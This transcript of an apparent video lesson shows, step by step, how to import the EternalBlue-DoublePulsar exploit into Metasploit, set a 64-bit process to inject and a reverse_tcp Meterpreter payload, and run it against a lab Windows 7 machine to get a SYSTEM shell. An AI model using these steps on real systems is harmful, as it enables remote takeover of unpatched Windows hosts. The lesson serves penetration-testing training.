[00:00:00] Welcome back. Time to check out a variant of the EternalBlue exploit. I prefer to always use this one for two different reasons. It has proven to work more often than the default Metasploit Framework exploit, and it also has slightly better options aimed at both 32-bit and 64-bit Windows systems. Nonetheless, we can read more about DoublePulsar right here. This is the official Rapid7 website, and here we can check out what exactly DoublePulsar is, when it is used and when it came out. So here it says DoublePulsar is an implant leaked by the Shadow Brokers group earlier this year that enables the execution of additional malicious code. So you can read right here, but you can also check out different websites in order to find out how exactly the exploit works, in case you're interested in that. But what is important for us in this video is how to run the exploit.

[00:00:58] Remember, we have no module in the Metasploit Framework for EternalBlue-DoublePulsar, so we must download the exploit ourselves and import it into the Metasploit Framework. This will be a little bit of a longer video, since there are a few things that we need to do to achieve this exploit. The first thing that we must do is install wine. And what is wine? Well, wine is a program that allows us to execute Windows applications on Linux systems.
[00:01:29] Why do we need this? Well, it is required for DoublePulsar to run. To install it, we can run the following command: sudo dpkg --add-architecture i386 && apt-get update && apt-get install wine32. The two && signs mean that we are going to add another command to this larger command, and that is apt-get update, and another command is apt-get install wine32. So these are three separate commands, and in the last one we are going to install wine32. If you press Enter and type in the password, this command should start executing. Now, if it tells you right here "permission denied", then just copy this command without the sudo, enter the root terminal by typing sudo su, then paste the command and press Enter, and now it should start executing all of these three commands. Now, I will Ctrl+C this because I have already performed this for you. Just wait for this to finish and then proceed with the tutorial.

[00:02:45] And the reason why we are doing all of this is because we need to get the wine directory with the drive_c folder. And you might be asking, well, what is that and where do I even find it? Well, sometimes it won't appear after installation, so what we must do is install some Windows program.
[00:03:05] In this case, let's just go and install Python 2 for Windows on our Kali Linux machine, not because we need it, but because after we install it, our drive_c folder will appear. And if you have no idea what I'm talking about, hang on for just a second and you will see it after we install this program. It is all required for our exploit to run. So navigate to this link right here, which is https://www.python.org/downloads/release/python-2714/. Here we should see this version of Python, and what we are interested in from all of these versions is the Windows x86 MSI installer. Click on it and click on Save File. It will start downloading our Windows installer, and once it has finished, we want to go to the Downloads directory and open a terminal inside of it. Once it does that, we can run the command wine msiexec /i and then the name of the file, which in my case and in your case will be python-2.7.14.msi.

[00:04:23] Just a small interrupt about this command that I just showed you. Make sure to execute it using the root terminal, so do not execute it using our regular Mr. Hacker terminal. Otherwise, in most cases, it might not actually work. So what you can do is you can just type sudo.
[00:04:41] You enter the password for your account and run wine msiexec /i and then the name of the file using the root terminal. OK, let's go back to the video. Click Enter, and this will start installing Python 2.7.14 as a Windows program. We want to click on Next on every step. So Next, Next, Next, Next. It shows that this already exists; I will click on Yes. And this installation should finish in just a few seconds. Once it is done, you can click on Finish, and right now we should have our wine folder in the root directory. So if I go to this directory, I need to go with cd /root.

[00:05:34] Let us just enter the terminal and go to the root directory. If we type ls, it will be empty. Did we fail somewhere? Well, not exactly. Once installed, wine will be a hidden directory, which means its name will start with a dot. And by the way, to list all the files inside of a directory, including hidden files, we can run the command ls -al, and here are all the hidden files, including our .wine directory. Now, if you cannot see it, make sure that you run this command, which is wine msiexec /i python-2.7.14.msi, from the root terminal.
[00:06:21] And just click on Next, Next, Next through the steps, and you should have this .wine folder inside of the root directory. Great. So if I go to that folder with cd .wine, here I will have the drive_c folder and some other folders as well. So everything works for now.

[00:06:42] Now that we got this ready, we can proceed to download our exploit. Go once again to Firefox, open a second tab and type "eternalblue doublepulsar", and it will show up this first link, which is a GitHub page. We want to click on it. And since we already know how to install a GitHub tool, let's just do it real quick. We just want to copy this link right here, go inside our terminal, and change the directory to the Desktop directory of our Mr. Hacker home. Once again, I advise you to run all of these commands using the root terminal, otherwise it might not work. Then type git clone, a basic command, and it should download the EternalBlue-DoublePulsar tool for us. Now, we are not done yet.

[00:07:35] We must do some modification in order for this tool to be able to open in the Metasploit Framework. If we type ls and change into the Eternalblue-Doublepulsar-Metasploit directory right here, we should have two interesting files. One of them is the Ruby file, which is the exploit itself, and the other one is this deps directory. Now, this is a directory.
[00:07:57] Once again, it is not a file, and you cannot really see that from the root terminal because different file types are not shown in different colors. And that is the only problematic thing. But nonetheless, what we must do is we must copy these two files. So let's go with copying deps first, to /usr/share/metasploit-framework/modules/exploits/windows/smb, and here we can copy the deps directory. To copy a directory, you just need to add -r at the end. So once again, copying the deps directory to this /usr/share/metasploit-framework/modules/exploits/windows/smb, click Enter, and it should copy the deps directory there. We want to do the same thing with the EternalBlue Ruby file: copy it to the same directory, modules/exploits/windows/smb. And here we want to keep it just for this file; you don't need to add a -r since it is a file and not a directory. OK, great.

[00:09:13] There is one more location that we want to copy both of these files to, so we'll just type once again the same command, just this time I will switch the location to the /root directory. So we'll copy deps into /root, add this -r at the end, and also copy the EternalBlue file to this /root directory as well. Great. Now we should be ready to go.
[00:09:38] Let us open our msfconsole. While this is opening, make sure that your Windows 7 machine is up and running, and let us straight away check out the IP address of this Windows 7 machine by typing ipconfig. It is 192.168.x.8 for me. And what we want to do once the console opens up is navigate to our EternalBlue-DoublePulsar exploit. And remember, we put it inside of the windows exploits, under the smb exploits. So what we can do is use exploit/windows/smb/ and then type the name of the exploit, which is eternalblue_doublepulsar. So just type eternalblue_doublepulsar and click Enter. And now we got our exploit imported in the Metasploit Framework. This is an exploit that we didn't have before.

[00:10:30] Let us show information for it. As it says in the description, this module exploits a vulnerability on the SMB version 1 and version 2 protocols through EternalBlue. After that, DoublePulsar is used to inject remotely a malicious DLL. Great. Let's also show options to see what options we got. And up here we got quite a few of them, and keep in mind that all of them are required.
[00:10:57] Now, here it tells us that we need to specify the path to the deps directory, so it seems that I made a mistake before: I copied it directly to the root directory, and we had to copy the entire folder. So what I'm going to do is open a second terminal, enter the root terminal, go to the Desktop of our Mr. Hacker account and copy this entire Eternalblue-Doublepulsar-Metasploit folder to the /root directory. So copy Eternalblue-Doublepulsar-Metasploit to /root. Make sure to add -r because we are copying a directory, and right now this path should be good and we should not really change it. We can just leave it right here, since the deps directory is inside of the Eternalblue-Doublepulsar-Metasploit directory, and we just copied it to the root directory. So these two are good.

[00:11:51] Under PROCESSINJECT it tells us right here "name of the process to inject", and we must change it to this process name right here for 64-bit machines. Since my Windows 7 machine is a 64-bit one, I will type this name right here and change the process to inject, since it is not set right here by default. So type set PROCESSINJECT, paste the name of the process and press Enter. If your Windows 7 machine is a 32-bit one, you can leave this wlms.exe as the process to inject.
[00:12:27] RHOST we already know to be the IP address, so we set it to 192.168.x.8. The RPORT we are going to leave at 445. The target architecture: if your Windows machine is a 32-bit one, you can leave it at x86; mine is 64-bit, so I will set the target architecture to x64.

[00:12:49] The wine path, and this is what we needed wine for: we need to set the wine path in order for all of this to work. And right here it is set correctly. Remember, our .wine folder is inside of the root directory, and the drive_c folder is inside of the .wine directory, so this is something that we will not change. Another configuration that we want to do is this payload option right here. It is currently set to windows/meterpreter/reverse_tcp, and remember, in one of the last few videos I told you that this is a payload for 32-bit Windows. If your Windows is 32-bit, once again, you don't need to change this. But if it is a 64-bit Windows, I want to type set payload windows/x64/meterpreter/reverse_tcp, then show options once again. Everything seems to be good now. You can also show targets if you want to, just to see what are all the possible targets that you can attack with this exploit. And once you check all of that out, you can just type run.
[00:13:59] This will launch our EternalBlue-DoublePulsar exploit on the target machine. It might take a few seconds for it to work. And here it is: our Meterpreter session is once again open, the exploit ran successfully, and we can once again run commands on the target system. We can enter a shell and get its command prompt. If I type whoami, it says that we are the SYSTEM-level account, so we are the highest privilege account once again. Great.

[00:14:34] Now, I know you're impatiently waiting for us to cover this Meterpreter shell and all of its commands, as well as the post-exploitation modules we can run with it. But hang on for just a little bit more. We got two more exploits to cover, and then we can proceed to creating our malicious files and using them, as well as running post-exploitation modules. In the next video, we're going to cover an exploit called BlueKeep, which was discovered in 2019. See you there.